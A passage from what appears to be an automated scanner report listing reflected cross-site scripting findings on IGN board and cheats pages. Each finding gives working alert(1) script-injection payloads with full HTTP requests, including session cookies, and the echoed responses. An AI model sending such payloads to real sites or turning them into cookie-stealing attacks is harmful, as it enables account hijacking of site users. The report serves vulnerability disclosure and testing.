<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/pc_games_and_more/c5060?771e2"style="x:expression(alert(1))"7f50f9fa2d2=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.75. http://boards.ign.com/playstation_boards/c5058 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /playstation_boards/c5058

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b88ff"style%3d"x%3aexpression(alert(1))"3782c71c347 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b88ff"style="x:expression(alert(1))"3782c71c347 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /playstation_boards/c5058?b88ff"style%3d"x%3aexpression(alert(1))"3782c71c347=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET 2.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:42 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5058; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:42 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 81438


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
PlayStation Boa
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/playstation_boards/c5058?b88ff"style="x:expression(alert(1))"3782c71c347=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.76. http://boards.ign.com/tv/c5026 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /tv/c5026

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5659d"style%3d"x%3aexpression(alert(1))"d0b714997f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5659d"style="x:expression(alert(1))"d0b714997f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /tv/c5026?5659d"style%3d"x%3aexpression(alert(1))"d0b714997f=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:43 GMT
Server: Microsoft-IIS/6.0
p3p:CP='NOI ADMa OUR STP'
X-Powered-By:ASP.NET
cluster-server:ignprdappw64212
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:43 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5026; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 67934


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
TV - IGN Boards
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/tv/c5026?5659d"style="x:expression(alert(1))"d0b714997f=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.77. http://boards.ign.com/xbox_360_boards/c5056 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boards.ign.com
Path:   /xbox_360_boards/c5056

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85096"style%3d"x%3aexpression(alert(1))"83a44cb2b94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85096"style="x:expression(alert(1))"83a44cb2b94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /xbox_360_boards/c5056?85096"style%3d"x%3aexpression(alert(1))"83a44cb2b94=1 HTTP/1.1
Host: boards.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:11:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET 2.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="TST"
X-AspNetMvc-Version: 1.0
Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:36 GMT; path=/; HttpOnly
Set-Cookie: CategoryView=5056; path=/
Cache-Control: private
Expires: Wed, 07 Feb 2001 01:11:36 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 74412


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
Xbox 360 Boards
...[SNIP]...
<a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/xbox_360_boards/c5056?85096"style="x:expression(alert(1))"83a44cb2b94=1&x=1" title="Switch to the white theme">
...[SNIP]...

1.78. http://cheats.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cd43"><script>alert(1)</script>bc6f5a7fbe9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7cd43"><script>alert(1)</script>bc6f5a7fbe9=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 00:58:46 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18740-885768600-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 00:58:46 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 568774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/?7cd43"><script>alert(1)</script>bc6f5a7fbe9=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.79. http://cheats.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 778c0"-alert(1)-"0daba286c40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?778c0"-alert(1)-"0daba286c40=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 00:58:52 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32465-2017572462-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 00:58:52 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297040332605v-1n-12mc+1297040332605mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 568696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/?778c0"-alert(1)-"0daba286c40=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.80. http://cheats.ign.com/index/cheats/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff66c"><script>alert(1)</script>3b17bfe17cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/cheats/index.html?ff66c"><script>alert(1)</script>3b17bfe17cb=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:05 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 138790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/cheats/index.html?ff66c"><script>alert(1)</script>3b17bfe17cb=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.81. http://cheats.ign.com/index/cheats/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ace91"-alert(1)-"91fa5ed4333 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/cheats/index.html?ace91"-alert(1)-"91fa5ed4333=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:10 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 138731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/index/cheats/index.html?ace91"-alert(1)-"91fa5ed4333=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.82. http://cheats.ign.com/index/nintendo-ds-cheats/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/nintendo-ds-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9af17"><script>alert(1)</script>af6bcff7071 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/nintendo-ds-cheats/index.html?9af17"><script>alert(1)</script>af6bcff7071=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:03 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 127678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/nintendo-ds-cheats/index.html?9af17"><script>alert(1)</script>af6bcff7071=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.83. http://cheats.ign.com/index/nintendo-ds-cheats/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/nintendo-ds-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0fc8"-alert(1)-"3c528f0452e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/nintendo-ds-cheats/index.html?c0fc8"-alert(1)-"3c528f0452e=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:06 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 127618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
== 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/index/nintendo-ds-cheats/index.html?c0fc8"-alert(1)-"3c528f0452e=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.84. http://cheats.ign.com/index/pc-cheats/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/pc-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b25b"-alert(1)-"859129d34f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/pc-cheats/index.html?8b25b"-alert(1)-"859129d34f=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:00 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 140541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
coreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/index/pc-cheats/index.html?8b25b"-alert(1)-"859129d34f=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.85. http://cheats.ign.com/index/pc-cheats/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/pc-cheats/index.html

Issue detail

